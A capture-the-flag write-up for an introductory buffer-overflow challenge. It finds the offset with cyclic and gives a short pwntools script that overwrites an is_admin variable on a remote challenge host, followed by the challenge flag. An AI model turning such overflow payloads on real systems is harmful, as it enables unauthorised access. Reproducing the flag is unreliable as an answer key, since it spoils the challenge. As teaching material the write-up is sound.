Difficulty: easy

Category: pwn

Author: xnull

Description:

### Buffer Overflow Introduction

This program asks for a password. There's a variable called is_admin that needs to equal 0xdeadbeef to get the flag.

The program uses gets(), which is vulnerable to buffer overflow.

**Access:** Connect to the binary with `ncat --ssl [host] [port]` or use pwntools.

The web interface provides educational content and downloadable source code.

Scenario

We can enter a password:

===== Secure Login System =====
Enter password: 11111
Access denied. is_admin = 0x0

Solution

We’ll first check where it breaks:

$ cyclic 512
$ ncat --ssl <url> 31337
==== Secure Login System =====
Enter password: <cyclic output>
Access denied. is_admin = 0x61616174
$ cyclic -l 0x61616174
76

Now we know we have to inject this at positionn 76:

from pwn import *
r = remote('fa33baee-b6c9-45f4-a55a-1ac8acbd5bcc.ctf.endolum.io', 31337, ssl=True)
r.sendline(b"A"*76+p64(0xdeadbeef))
r.interactive()

Flag: ENDLM{62f9941e43bc17ea6ff2aa2311f1c1ba1c3432cb25810ef6}

Scenario#

Solution#

Scenario

Solution